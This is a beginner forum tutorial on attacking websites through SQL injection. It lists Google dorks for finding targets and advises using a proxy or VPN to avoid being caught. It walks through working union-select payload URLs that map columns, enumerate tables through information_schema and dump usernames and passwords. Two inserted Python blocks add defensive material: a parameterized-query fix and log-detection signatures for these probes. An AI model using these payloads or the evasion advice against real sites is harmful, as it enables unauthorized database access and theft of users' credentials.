SQL Injection Tutorial For Beginners

February 16, 2016

This is a tutorial for people who would like to learn how to SQL inject into a site.

FAQ

What is a SQL Injection? 

A SQL injection is a technique that lets someone run their own queries against a website's MySQL database by supplying crafted input through the website itself.

What can I do with an SQLi?

You can extract data such as passwords, usernames, and locations, and you can also change the site so that it shows whatever you want.

Is it hard to do?

At first, it may take you some time to get used to the queries. But after some practice, it's very easy.

Will I get caught?

If you are not using a proxy or VPN (Virtual Private Network), then yes, there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are.

What is a dork?

A dork is a phrase of the kind you see at the end of many URLs. In SQL injection, you search for dorks to find a website that looks as though it may be vulnerable to injection.

Injection Tutorial

Step 1. Search Google by typing in a dork and clicking one of the websites that show up.

Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=

Step 2. Once you have found a site, it's time to check whether it is vulnerable to SQL injection.

So let's say we have a site like this:

http://www.site.com/index.php?id=1

What we do is put a ' (single quote) after the number, so that the quote ends up inside the site's SQL query and causes an error to show up on the page.

http://www.site.com/index.php?id=1'

You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something similar.

Step 3. After getting the error, we know the site is vulnerable to SQL injection. Now we have to find out how many columns the query has. We use the "order by" clause to do this.

http://www.site.com/index.php?id=1 order by 10

Now, I suggest you go by 10's. If a number gives an error, that means you should try a lower number. You are looking for a number that gives no error while the number right after it does give an error.

So let's say we did:

order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)

What this means is that there are 8 columns.

Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We do this by putting a "-" minus sign after the = equals sign in the URL (so the site's own row is no longer returned and the row we add is what gets displayed) and by using union select. After union select, write every number from 1 up to the number of columns, separated by commas.

So here's how it should look:

http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8

After you do this, one or more of the numbers you listed should show up on the page.

Step 5. Let's say the number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by using @@version.

http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8

Replace the number 2 in the URL with @@version to get the version number to show up on your screen. The version that appears should start with either 5.(some numbers) or 4.(some numbers).
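To see why the probes in Steps 2 to 4 behave as described, and what stops them, here is an added example that is not part of the original tutorial: a lookup written the vulnerable way (the URL parameter glued into the SQL string) next to the same lookup with a bound parameter. It assumes a small pages table and uses an in-memory SQLite database instead of MySQL, so the error messages differ from the one quoted above, but the error / no error pattern is the same.

```python
"""Why the tutorial's probes work, and why bound parameters stop them.

Added example, not code from the original post. It uses an in-memory
SQLite database instead of MySQL so it runs offline; the error text
differs from the MySQL message quoted in the tutorial, but the
behaviour of the ' and 'order by N' probes is the same.
"""
import sqlite3

# Constructed sample data: a three-column table behind index.php?id=N.
SAMPLE_ROWS = [
    (1, "Home", "Welcome to the site"),
    (2, "About", "About us"),
]


def make_db():
    """Build the sample database in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, page_id):
    """The pattern the tutorial relies on: the URL parameter is pasted
    straight into the SQL text, so whatever it contains is parsed as SQL."""
    query = "SELECT id, title, body FROM pages WHERE id=" + page_id
    return conn.execute(query).fetchall()


def lookup_safe(conn, page_id):
    """Hardened form: the value is bound as a parameter. The database
    receives the SQL and the value separately, so the value is only ever
    compared against id, never parsed as part of the query."""
    query = "SELECT id, title, body FROM pages WHERE id=?"
    return conn.execute(query, (page_id,)).fetchall()


def probe(fn, conn, page_id):
    """Run one lookup and report ('ok', rows) or ('error', message), which is
    what the tutorial's 'error / no error' observations boil down to."""
    try:
        return ("ok", fn(conn, page_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


# The inputs from the tutorial's Steps 2 to 4, applied to both forms.
PROBES = ["1", "1'", "1 order by 3", "1 order by 4", "-1 union select 1,2,3"]


def compare(conn):
    """Map each probe to (vulnerable result, hardened result)."""
    return {p: (probe(lookup_vulnerable, conn, p), probe(lookup_safe, conn, p))
            for p in PROBES}


if __name__ == "__main__":
    for inp, (vuln, safe) in compare(make_db()).items():
        print(f"{inp!r:26} vulnerable={vuln[0]:5}  hardened={safe[0]:5} rows={safe[1]}")
```

Against the vulnerable lookup, the quote raises a syntax error, "order by 4" errors because the query only has three columns, and the negative id with a union returns the row of numbers; against the parameterized lookup every one of those inputs is simply a string that matches no id, so nothing errors and nothing leaks. That single difference is the fix for everything this tutorial describes.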

For SQL Version 5 Injection:

Step 1. Now that we have the version number, it's time to get the names of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the names of all tables are already listed in one built-in database called information_schema. We end the query with -- so that the rest of the site's original query is treated as a comment and our command runs as written.

http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now look for anything that might contain the usernames and passwords of everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.

Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time. 

After information_schema.columns, you need to tell the database which table you want to extract the columns from. So after .columns, you put where table_name=(name of the table in hex form).
To convert the name of the table you're extracting from into hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it and paste the whole thing after the = equals sign. For example, users in hex is 7573657273, so it becomes 0x7573657273.

So after all that it should look like this:

http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273

The name of the columns should pop up on your screen.

Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function. 

Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (the table name that you chose, in text form, not hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, your URL should look like this:

http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--

Now the usernames should show up, then a colon, then the password for each username.

For SQL Version 4 Injection:

For version 4 database SQL injections, it's the same thing as version 5. The only difference is that when trying to find the table name, you have to guess what it is; it's not already listed for you like in version 5. I suggest guessing names like user, admin, or members, and if that doesn't work, keep trying until you get something. After you've got the table name, just follow the same steps as for version 5.
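From the defending side, the sequence of requests this tutorial walks through (a stray quote, a run of order by N, a union select, then information_schema lookups with a hex-encoded table name) is exactly what shows up in a web server's access log. The following added example, which is not from the original post, scans constructed access log lines for those patterns after URL-decoding the query string, decodes any 0x hex literal so an analyst can read the table name (0x7573657273 is users), and reports the order in which each client escalated. The log lines, IP addresses and paths are made up for the example.

```python
"""Spotting the tutorial's probe sequence in web server access logs.

Added example, not from the original post. The log lines below are
constructed; the format is the common Apache/nginx combined format,
but only the client IP, timestamp, request path and status are used.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (documentation-range IPs, fictional site).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Feb/2016:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Feb/2016:10:01:09 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 312
203.0.113.5 - - [16/Feb/2016:10:01:20 +0000] "GET /index.php?id=1%20order%20by%2010 HTTP/1.1" 500 312
203.0.113.5 - - [16/Feb/2016:10:01:31 +0000] "GET /index.php?id=1%20order%20by%208 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Feb/2016:10:02:05 +0000] "GET /index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8 HTTP/1.1" 200 4870
203.0.113.5 - - [16/Feb/2016:10:02:40 +0000] "GET /index.php?id=-1%20union%20select%201,group_concat(column_name),3,4,5,6,7,8%20from%20information_schema.columns%20where%20table_name=0x7573657273 HTTP/1.1" 200 4901
198.51.100.7 - - [16/Feb/2016:10:03:00 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5080
"""

# client, timestamp, request path, status code from a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Each signature is matched against the URL-decoded, lower-cased query string.
# They follow the tutorial's own steps; real deployments would tune and extend them.
SIGNATURES = [
    ("quote_probe", re.compile(r"=\s*-?\d+'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("version_probe", re.compile(r"@@version")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b")),
]

HEX_RE = re.compile(r"\b0x([0-9a-f]{2,})\b")


def decode_hex_literals(text):
    """Turn 0x7573657273 into 'users' when the bytes are printable ASCII."""
    decoded = []
    for hexdigits in HEX_RE.findall(text):
        if len(hexdigits) % 2:
            continue  # odd length cannot be whole bytes
        raw = bytes.fromhex(hexdigits)
        if all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, path, status = m.groups()
    # Decode %27, %20, + and friends first; the payloads arrive encoded.
    query = unquote_plus(path.partition("?")[2])
    lowered = query.lower()
    hits = [name for name, rx in SIGNATURES if rx.search(lowered)]
    if not hits:
        return None
    return {"ip": ip, "time": ts, "status": int(status), "signatures": hits,
            "decoded_hex": decode_hex_literals(lowered), "query": query}


def analyse_log(text):
    """All findings in a log, in file order."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]


def sequence_by_ip(findings):
    """First-seen order of probe types per client. The progression
    quote -> order by -> union select -> information_schema is the
    tutorial's own recipe, so seeing it from one client is a strong signal."""
    seq = {}
    for f in findings:
        order = seq.setdefault(f["ip"], [])
        for name in f["signatures"]:
            if name not in order:
                order.append(name)
    return seq


if __name__ == "__main__":
    found = analyse_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["status"], f["signatures"], f["decoded_hex"])
    for ip, order in sequence_by_ip(found).items():
        print(ip, "->", " > ".join(order))
```

Two details matter in practice: decode the query string before matching, because `%27` and `%20` hide the quote and the spaces from naive substring checks, and keep the status code, since the 500 on the quote probe followed by 200s on the union requests is the error / no-error oracle the tutorial is reading. The second client in the sample, which only ever asks for id=2, produces no finding.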

Thank you for reading my tutorial, if you have any questions you can post here or PM me and I'll do the best I can to help you.

Credits to @j2
